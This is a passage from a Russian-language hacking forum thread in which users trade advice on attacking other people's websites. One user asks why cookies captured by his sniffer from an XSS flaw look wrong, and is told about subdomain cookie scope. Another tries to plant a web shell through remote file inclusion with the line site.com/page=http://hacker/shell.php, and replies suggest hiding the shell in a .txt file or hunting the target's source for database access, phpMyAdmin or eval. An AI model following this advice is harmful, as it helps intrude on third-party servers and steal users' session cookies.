Старый 08.01.2011, 11:14   #741
morty10
 
Аватар для morty10
 
Регистрация: 05.07.2010
Сообщений: 77
По умолчанию

файла нет.
а смотреть разве что в исходниках страницы.
__________________
Research for share.
morty10 вне форума   Ответить с цитированием
Старый 09.01.2011, 23:33   #742
M1lten
 
Регистрация: 02.12.2010
Сообщений: 40
Репутация: -1
По умолчанию

Тут такое дело.. Есть сайт с xss, есть другой хост с моим сниффером... Так вот на снифер приходят куки вида bla-bla=asdasd , А должны bla-bla=123 (это пример). Почему содержимое кукисов приходит другое?
M1lten вне форума   Ответить с цитированием
Старый 10.01.2011, 13:35   #743
Nightmare
Banned
 
Регистрация: 06.07.2010
Сообщений: 162
Репутация: 10
По умолчанию

Цитата:
Сообщение от M1lten Посмотреть сообщение
Тут такое дело.. Есть сайт с xss, есть другой хост с моим сниффером... Так вот на снифер приходят куки вида bla-bla=asdasd , А должны bla-bla=123 (это пример). Почему содержимое кукисов приходит другое?
Возможно, что ты нашёл XSS на поддомене сайта, а куки хочешь с главного сайта.
Nightmare вне форума   Ответить с цитированием
Старый 10.01.2011, 20:27   #744
0x0
 
Аватар для 0x0
 
Регистрация: 09.01.2011
Сообщений: 11
Репутация: 4
По умолчанию

В чем проблема. пробую залить шелл - site.com/page=http://hacker/shell.php (проверок на розширение нету). То он сначала исполняется на мом сайте и открывается, типа я просматриваю шелл на своем сайте. Как сделать чтобы он исполнялся на атакуемом сервере?
__________________
Подписи с "конями" противоречат правилам форума:
https://rdot.org/forum/showthread.php?t=1174
//выпилено Jokester.
0x0 вне форума   Ответить с цитированием
Старый 10.01.2011, 20:28   #745
napas_hd
 
Регистрация: 09.07.2010
Сообщений: 70
Репутация: 4
По умолчанию

0x0, залей в txt, чтобы код не интерпретировался.
napas_hd вне форума   Ответить с цитированием
Старый 10.01.2011, 20:31   #746
0x0
 
Аватар для 0x0
 
Регистрация: 09.01.2011
Сообщений: 11
Репутация: 4
По умолчанию

КОгда в тхт , то оно ещо просто читает , как блокнот открывает
__________________
Подписи с "конями" противоречат правилам форума:
https://rdot.org/forum/showthread.php?t=1174
//выпилено Jokester.
0x0 вне форума   Ответить с цитированием
Старый 10.01.2011, 20:38   #747
m0Hze
 
Аватар для m0Hze
 
Регистрация: 05.07.2010
Сообщений: 326
Репутация: 129
По умолчанию

Цитата:
Сообщение от 0x0 Посмотреть сообщение
КОгда в тхт , то оно ещо просто читает , как блокнот открывает
Значит это просто читалка файлов. Читай исходники.
__________________
multi-vpn.biz - Первый VPN на Эллиптических кривых со скоростью света.
m0Hze вне форума   Ответить с цитированием
Старый 10.01.2011, 20:46   #748
0x0
 
Аватар для 0x0
 
Регистрация: 09.01.2011
Сообщений: 11
Репутация: 4
По умолчанию

Цитата:
Сообщение от m0Hze Посмотреть сообщение
Значит это просто читалка файлов. Читай исходники.
Значит шелл не залить?
В сорсах ничего нет(
__________________
Подписи с "конями" противоречат правилам форума:
https://rdot.org/forum/showthread.php?t=1174
//выпилено Jokester.
0x0 вне форума   Ответить с цитированием
Старый 10.01.2011, 20:53   #749
m0Hze
 
Аватар для m0Hze
 
Регистрация: 05.07.2010
Сообщений: 326
Репутация: 129
По умолчанию

Цитата:
Сообщение от 0x0 Посмотреть сообщение
Значит шелл не залить?
В сорсах ничего нет(
В сорцах всегда что-нибудь есть. Копай, смотри на доступы к бд, вомзожно есть phpmydamin, а там бд от вп или еще чего, и там уже шел залить при правах не проблема.
Возможно вообще в коде найдешь Eval, ктож его знает
__________________
multi-vpn.biz - Первый VPN на Эллиптических кривых со скоростью света.
m0Hze вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2022, Jelsoft Enterprises Ltd. Перевод: zCarot